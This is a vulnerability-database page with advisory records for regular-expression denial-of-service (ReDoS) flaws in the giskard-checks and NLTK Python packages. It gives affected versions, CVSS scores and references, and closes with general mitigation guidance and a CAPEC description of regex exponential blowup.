  "details": "## Summary\nThe RegexMatching check in the `giskard-checks` package passes a user-supplied regular expression pattern directly to Python\u0027s re.search() without any timeout, complexity guard, or pattern validation. An attacker who can control the regex pattern or the text being matched can craft inputs that trigger catastrophic backtracking in the regex engine, causing the process to hang indefinitely and denying service to all other operations. \n\n`giskard-checks` is a local developer testing library. Check definitions, including the pattern parameter, are provided in application code or configuration files and executed locally. Exploitation requires write access to a check definition and subsequent execution of the test suite. The absence of a regex timeout could cause availability issues in automated environments such as CI/CD pipelines.\n\n## Affected component\n \n`text_matching.py`, line 457: `re.search(pattern, text)`\n \n## Remediation\n \nUpgrade to `giskard-checks` \u003e= 1.0.2b1.\n \n## Credit\n \nGiskard-AI thanks @dhabaleshwar for identifying the missing timeout on regex evaluation.",
  "id": "GHSA-rq2q-4r55-9877",
  "modified": "2026-04-27T15:02:29Z",
  "published": "2026-04-14T23:13:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Giskard-AI/giskard-oss/security/advisories/GHSA-rq2q-4r55-9877"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40319"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Giskard-AI/giskard-oss"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Giskard-AI/giskard-oss/releases/tag/giskard-checks%2Fv1.0.2b1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Giskard has a Regular Expression Denial of Service (ReDoS) in RegexMatching Check"
}

GHSA-RQJH-JP2R-59CJ

Vulnerability from github – Published: 2022-01-06 22:24 – Updated: 2024-09-26 14:14
VLAI
Summary
NLTK Vulnerable to REDoS
Details

NLTK is vulnerable to REDoS in some RegexpTaggers used in the functions get_pos_tagger and malt_regex_tagger.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "nltk"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.6.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-3842"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-01-06T19:53:00Z",
    "nvd_published_at": "2022-01-04T15:15:00Z",
    "severity": "HIGH"
  },
  "details": "NLTK is vulnerable to REDoS in some RegexpTaggers used in the functions `get_pos_tagger` and `malt_regex_tagger`.",
  "id": "GHSA-rqjh-jp2r-59cj",
  "modified": "2024-09-26T14:14:41Z",
  "published": "2022-01-06T22:24:14Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3842"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nltk/nltk/pull/2906"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nltk/nltk/commit/2a50a3edc9d35f57ae42a921c621edc160877f4d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nltk/nltk"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/nltk/PYSEC-2022-5.yaml"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/761a761e-2be2-430a-8d92-6f74ffe9866a"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "NLTK Vulnerable to REDoS"
}

Mitigation
Architecture and Design

Use regular expressions that do not support backtracking, e.g. by removing nested quantifiers.

Mitigation
System Configuration

Set backtracking limits in the configuration of the regular expression implementation, such as PHP's pcre.backtrack_limit. Also consider limits on execution time for the process.

Mitigation
Implementation

Do not use regular expressions with untrusted input. If regular expressions must be used, avoid using backtracking in the expression.

Mitigation
Implementation

Limit the length of the input that the regular expression will process.

CAPEC-492: Regular Expression Exponential Blowup

An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.